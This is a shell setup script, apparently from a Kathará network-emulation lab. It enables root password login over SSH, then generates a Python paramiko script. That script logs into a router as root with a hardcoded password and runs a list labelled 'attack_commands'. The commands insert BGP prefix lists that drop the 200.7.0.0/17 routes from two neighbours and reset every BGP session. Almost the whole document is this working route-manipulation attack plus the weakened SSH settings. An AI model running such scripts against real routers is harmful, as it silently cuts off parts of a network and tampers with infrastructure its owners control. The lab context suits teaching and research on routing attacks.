ifconfig eth0 inet 198.8.8.2/30

route add default gw 198.8.8.1

service ssh start

echo UseLogin yes >> /etc/ssh/sshd_config
echo PermitRootLogin yes >> /etc/ssh/sshd_config
echo PasswordAuthentication yes >> /etc/ssh/sshd_config

service ssh restart

ssh-keygen

ssh-copy-id root@198.8.8.1

printf "import paramiko \nfrom getpass import getpass \nimport time \
\nhost = \"198.8.8.1\" \nport = 22 \nusername = \"root\" \npassword = \"kathara\" \
\nremote_conn_pre = paramiko.SSHClient() \
\nremote_conn_pre.set_missing_host_key_policy(paramiko.AutoAddPolicy()) \
\nremote_conn_pre.connect(host, port=22, username=username, password=password, look_for_keys=False, allow_agent=False) \
\nremote_conn = remote_conn_pre.invoke_shell() \
\noutput = remote_conn.recv(65535) \
\nprint(output.decode(\"utf-8\")) \
\nattack_commands = [\'vtysh%s', \'conf t%s', \'router bgp 3%s', \'neighbor 200.2.0.1 prefix-list partialInRouter2 in%s', \'ip prefix-list partialInRouter2 deny 200.7.0.0/17 le 32%s', \'ip prefix-list partialInRouter2 permit any%s', \'router bgp 3%s', \'neighbor 198.8.8.6 prefix-list partialInRouter7 in%s', \'ip prefix-list partialInRouter7 deny 200.7.0.0/17 le 32%s', \'ip prefix-list partialInRouter7 permit any%s', \'do clear ip bgp *%s', \'exit%s'] \
\n
\nfor attack_command in attack_commands: \
\n    remote_conn.send(attack_command) \
\n    time.sleep(.5) \
\n    output = remote_conn.recv(65535) \
\n    print(output.decode(\"utf-8\")) " "\n" "\n" "\n" "\n" "\n" "\n" "\n" "\n" "\n" "\n" "\n" "\n" >> routeFilterScript.py